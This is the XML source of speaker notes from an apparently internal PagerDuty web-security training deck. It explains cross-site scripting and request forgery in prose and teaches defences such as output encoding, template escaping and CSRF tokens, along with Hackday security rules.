          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1478" name="Shape 1478"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>If the site is vulnerable to XSS, whenever anyone visits that page, their browser will now show them a popup message saying "hello".</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>So OK, that's kind of annoying, but it's not really that dangerous is it?</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6" name="Shape 1486"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1487" name="Shape 1487"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Actually, yeah, it's pretty dangerous.</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7" name="Shape 1497"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1498" name="Shape 1498"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Because an attacker could use this to steal all sorts of information, maybe even your cookies (We'll be talking more about what those are later), which means the attacker could login to the website as if they are you, and the website wouldn't know the difference.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>If they can't steal cookies, they could surreptitiously steal information about your account instead, post comments as you, etc. Whatever JavaScript they can think of, they could execute as you.</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6" name="Shape 1506"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1507" name="Shape 1507"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Some common advice for dealing with XSS is to make sure you're sanitizing all your inputs. That's generally good advice anyway, but it won't cover all cases for XSS and can still leave you vulnerable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>While validating you have an integer when you expect an integer is good, (or alphanumeric when you expect it, etc). It doesn't always work for other fields, like descriptions or comments. You'll end up stripping things that shouldn't be stripped. For example, what if someone wants to post code as a comment? Sometimes you really do need to present what the user entered verbatim.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Another statement I hear occasionally is "It's just temporary for a Hackday", often used as an excuse for attempting to ignore security best practices.</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5" name="Shape 1515"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1516" name="Shape 1516"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Instead, the only surefire way to protect against XSS is to encode all user information when it is rendered back to the user, such that it cannot be executed by the browser. All characters would be encoded so the browser displays them as is, and doesn't interpret them as raw code to be executed.</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0" name="Shape 1530"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1531" name="Shape 1531"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>If our previous example was encoding on output, it would have looked like this in the HTML, and would never have shown the popup message to users. That's what we want.</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3" name="Shape 1553"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1554" name="Shape 1554"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>So how do you do this encoding? It depends on the language you're using. We use a lot of Ember here at PagerDuty, and in Ember you just need to wrap variables with {{ }}. But, add one more { } to the mix, and it will no longer encode your output. So you need to be very careful that you use the appropriate method.</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6" name="Shape 1576"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1577" name="Shape 1577"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>We also have lots of HAML, which similarly can encode output for us. In this case, just make sure to use = and not != when outputting a variable. The ! would disable the encoding and make it susceptible to XSS.</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5" name="Shape 1585"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1586" name="Shape 1586"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>The key takeaway here is that user supplied data should always be encoded when it's output back to a browser. Never let a user control what can be executed on your site.</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4" name="Shape 1594"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1595" name="Shape 1595"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Even though it's what I focussed on here, it's not just HTML output that needs to be encoded. You can't just HTML encode output and put it anywhere, the way you encode needs to change based on where it is. If the user value is getting placed between some &lt;script&gt; tags, or inside CSS, then HTML entity encoding won't be enough to protect you. They all need to be encoded too, and each in their own special ways.</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3" name="Shape 1603"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1604" name="Shape 1604"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>So you'll want to use a library to do this for you. I have some warnings about using libraries and frameworks earlier, but that doesn't mean you shouldn't use them, just don't blindly rely on them.</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3" name="Shape 1613"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1614" name="Shape 1614"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>If you want to read more about cross-site scripting, here are some good links with more information. CSP or Content Security Policy is something I didn't get time to cover, but is another way to prevent XSS if implemented correctly. So I encourage you to read up on that.</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2" name="Shape 1622"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1623" name="Shape 1623"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>OK, next topic. Cross-Site Request Forgery, usually abbreviated to CSRF.</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2" name="Shape 1632"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1633" name="Shape 1633"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>CSRF is all about tricking a user into performing an action they didn't want to perform (or didn't realize they were performing). It can be a little tricky to wrap your head around, so let's start with a quick example.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r>
              <a:t>Just because it's a Hackday, it doesn't mean you can ignore the rules. I know you want to make something work quickly, and you don't want to mess about with all this "security" stuff. But it's important and should not be ignored. You shouldn't be trying to disable firewall rules for Hackdays (and yes, we do get immediately paged if you try), and you shouldn't use a public code repository to develop your Hackday idea, it's fine to open-source it later, but sometimes you can give away information we don't want to be public yet.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Finally, you should never ever be using customer data for your Hackdays, unless you're at the stage where it's getting pushed to production. We went over this on our last training, but I'll reiterate it again, customer data should never, under any circumstances, leave our production environment.</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2" name="Shape 1642"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1643" name="Shape 1643"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Let's start off by pretending to be an attacker.</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0" name="Shape 1660"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1661" name="Shape 1661"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>We have a forum where people can post comments. Here you can see a user called Rich has posted some comments, and now the attacker (that's us) is going to add one too.</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9" name="Shape 1679"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1680" name="Shape 1680"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>We're going to post an image, but rather than link to an actual image file, we're going to set the link as the URL to logout instead.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:p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8" name="Shape 1688"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1689" name="Shape 1689"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Let's change perspectives now and view things from the user's point of view.</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9" name="Shape 1709"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1710" name="Shape 1710"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>When Rich visits the page, they're going to see a broken link. But in the background, their browser made a request to get the image. Let's see what's happening behind the scenes...</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6" name="Shape 1736"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1737" name="Shape 1737"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Behind the scenes, Rich's browser has seen that the user wants to load an image. It knows the website it's requesting an image for, and has some cookies for that site (we'll talk more about these in a moment), so it makes the request and sends along the cookies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>From the website's point of view, the user, from their own browser, with all their authentication information, just asked them to logout. So what does it do? It logs them out!</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0" name="Shape 1750"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1751" name="Shape 1751"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>So the outcome is that Rich has been logged out from the site, just by visiting an unrelated web page. Now logout isn't necessarily a nefarious action, but this could certainly become annoying for users.</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8" name="Shape 1758"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1759" name="Shape 1759"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>When demonstrating CSRF using GET requests, one of the frequent comments is "Couldn't we do this as a POST request to stop it?", since the user will then need to actually click a button instead of just visiting the page. In the previous example that may have helped, but only because of the example I was using. So let's look at a different example of CSRF against POST requests.</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9" name="Shape 1769"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1770" name="Shape 1770"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>In this example, we've crafted a form which will delete an account on example.com. We've put the text of the button to say "Click here to win a prize!". All we have to do is trick a user into clicking the button, which can be done a variety of different ways using social engineering. We can present the button anywhere, it doesn't have to be on the same website. We could host it on an internal wiki if we wanted. Once they click it though, if the example.com site is susceptible to CSRF, then their account would get deleted.</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7" name="Shape 1777"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1778" name="Shape 1778"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>That's pretty scary. You click a random button on a website, and an account you have on a completely unrelated website gets deleted. It's an extreme example, but it gives you an idea of how scary these types of vulnerabilities can be.</a:t>
            </a:r>
          </a:p>
          <a:p>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p>
            <a:pPr/>
            <a:r>
              <a:t>With that out of the way, let's jump into a bit of story time.</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8" name="Shape 1788"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1789" name="Shape 1789"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>So how do we protect against CSRF? We use something called a "synchronizer token", or "CSRF token". This is a hidden field you include on every single form for a user, which contains a value that's private to a particular user's session.</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9" name="Shape 1799"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1800" name="Shape 1800"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>We want these tokens to be unique per user and session, be a large random value, and generated by a cryptographically secure random number generator. Basically, we don't want these tokens to be at all guessable, or shared with anyone else.</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0" name="Shape 1810"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1811" name="Shape 1811"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>So how do they work? Well, once you've assigned one of these tokens to a user's session, you make sure to include it on every form that's presented to a user, where it will contain the value for that specific user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Then on the server-side, whenever you receive a request from that user, you verify that a token is present, that it's the user's token, and that it hasn't expired. (You can also make the tokens single-use, and validate it's not already used. That's a bit more complicated though and not always necessary).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>If any of these checks fail, then the request should be aborted, since it could be a potential CSRF attack.</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4" name="Shape 1824"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
